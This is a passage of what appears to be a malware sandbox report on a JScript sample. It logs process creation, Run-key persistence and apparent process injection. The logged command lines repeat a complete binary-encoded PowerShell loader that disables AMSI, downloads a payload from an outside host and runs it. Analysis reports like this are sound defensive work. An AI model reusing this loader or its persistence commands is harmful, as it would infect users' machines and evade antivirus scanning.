1,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) | %{ [system.text.encoding]::utf8.getstring([system.convert]::toint32($_,2)) };i`e`x([system.string]::join('', $gf))"c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /v "lol" /t reg_sz /f /d "c:\users\test22\appdata\roaming\protected client.js"reg add "hkcu\software\microsoft\windows\currentversion\run" /v "lol" /t reg_sz /f /d "c:\users\test22\appdata\roaming\protected client.js"cmd /c copy "c:\users\test22\appdata\local\temp\protected client.js" "c:\users\test22\appdata\roaming\" /yc:\windows\syswow64\notepad.exe"c:\windows\system32\cmd.exe" /c copy "c:\users\test22\appdata\local\temp\protected client.js" "c:\users\test22\appdata\roaming\" /y

One or more non-whitelisted processes were created (7 events)

parent_process	powershell.exe	martian_process	C:\Windows\SysWOW64\notepad.exe
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf))
parent_process	wscript.exe	martian_process	cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\Protected Client.js"
parent_process	wscript.exe	martian_process	powershell $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf))
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\Protected Client.js"
parent_process	wscript.exe	martian_process	cmd /c copy "C:\Users\test22\AppData\Local\Temp\Protected Client.js" "C:\Users\test22\AppData\Roaming\" /Y
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c copy "C:\Users\test22\AppData\Local\Temp\Protected Client.js" "C:\Users\test22\AppData\Roaming\" /Y

Resumed a suspended thread in a remote process potentially indicative of process injection (8 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2232 resumed a thread in remote process 2860
Process injection	Process 2232 resumed a thread in remote process 2200
Process injection	Process 2232 resumed a thread in remote process 776
Process injection	Process 2860 resumed a thread in remote process 2564
NtResumeThread Sept. 9, 2021, 8 p.m.	thread_handle: 0x0000035c suspend_count: 1 process_identifier: 2860	1	0	0
NtResumeThread Sept. 9, 2021, 8 p.m.	thread_handle: 0x00000360 suspend_count: 1 process_identifier: 2200	1	0	0
NtResumeThread Sept. 9, 2021, 8 p.m.	thread_handle: 0x00000368 suspend_count: 1 process_identifier: 776	1	0	0
NtResumeThread Sept. 9, 2021, 8:01 p.m.	thread_handle: 0x00000550 suspend_count: 1 process_identifier: 2564	1	0	0

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (27 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Sept. 9, 2021, 8 p.m.	thread_identifier: 2864 thread_handle: 0x0000035c process_identifier: 2860 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf)) filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002c0	1	1
NtResumeThread Sept. 9, 2021, 8 p.m.	thread_handle: 0x0000035c suspend_count: 1 process_identifier: 2860	1	0
CreateProcessInternalW Sept. 9, 2021, 8 p.m.	thread_identifier: 2308 thread_handle: 0x00000360 process_identifier: 2200 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\Protected Client.js" filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000374	1	1
NtResumeThread Sept. 9, 2021, 8 p.m.	thread_handle: 0x00000360 suspend_count: 1 process_identifier: 2200	1	0
CreateProcessInternalW Sept. 9, 2021, 8 p.m.	thread_identifier: 2512 thread_handle: 0x00000368 process_identifier: 776 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c copy "C:\Users\test22\AppData\Local\Temp\Protected Client.js" "C:\Users\test22\AppData\Roaming\" /Y filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000378	1	1
NtResumeThread Sept. 9, 2021, 8 p.m.	thread_handle: 0x00000368 suspend_count: 1 process_identifier: 776	1	0
NtResumeThread Sept. 9, 2021, 8 p.m.	thread_handle: 0x00000298 suspend_count: 1 process_identifier: 2860	1	0
NtResumeThread Sept. 9, 2021, 8 p.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 2860	1	0
NtResumeThread Sept. 9, 2021, 8 p.m.	thread_handle: 0x00000438 suspend_count: 1 process_identifier: 2860	1	0
